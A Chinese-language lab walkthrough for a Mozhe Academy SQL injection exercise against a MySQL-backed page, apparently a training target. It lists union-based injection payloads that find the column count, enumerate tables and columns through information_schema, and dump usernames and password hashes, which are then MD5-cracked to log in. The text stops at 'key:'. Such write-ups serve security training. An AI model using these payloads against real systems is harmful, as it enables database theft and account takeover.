SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)

地址：https://www.mozhe.cn/bug/djdsS0VVb0sxVytXY0NKMXZUeGJ4dz09bW96aGUmozhe?page=3

解题过程

1. 寻找可注入网页，原网页尝试任意账密登录后地址栏没有回显，发现点击下图中的通知网页后地址栏信息为

   http://219.153.49.228:47011/new_list.php?id=1 //可能存在注入点
   

2. 寻找回显，构造Payload分别进行注入

   ?id=1 and 1=1 –

   ?id=1 and 1=2 –

说明存在注入点；

3. 查询字段（列）数：字段数为4

   ?id=1 order by 4 –

   or

   ?id=1 order by 5 –

4. 确认回显位置：2,3 均为回显位

   ?id=-1 union select 1,2,3,4 –

5. 查询数据库名以及数据库版本：mozhe_Discuz_StormGroup

   ?id=-1 union select 1,database(),version(),4 –

6. 查询数据表：StormGroup_member,notice

   ?id=-1 union select 1,group_concat(table_name),version(),4 from information_schema.tables where table_schema=database() –

7. 查询字段：id,name,password,status

   ?id=-1 union select 1,group_concat(column_name),version(),4 from information_schema.columns where table_name=‘StormGroup_member’ and table_schema=database() –

8. 查看字段内容：

   ?id=-1 union select 1,group_concat(id,0x3a,name,0x3a,password,0x3a,status),3,4 from StormGroup_member –

9. 经查询得到两条数据，观察可得用户名name=‘mozhe’

   status（状态）一个为1，一个为0，考虑为1的密码是正确密码，经md5解密

10. 登录原网页，拿到key: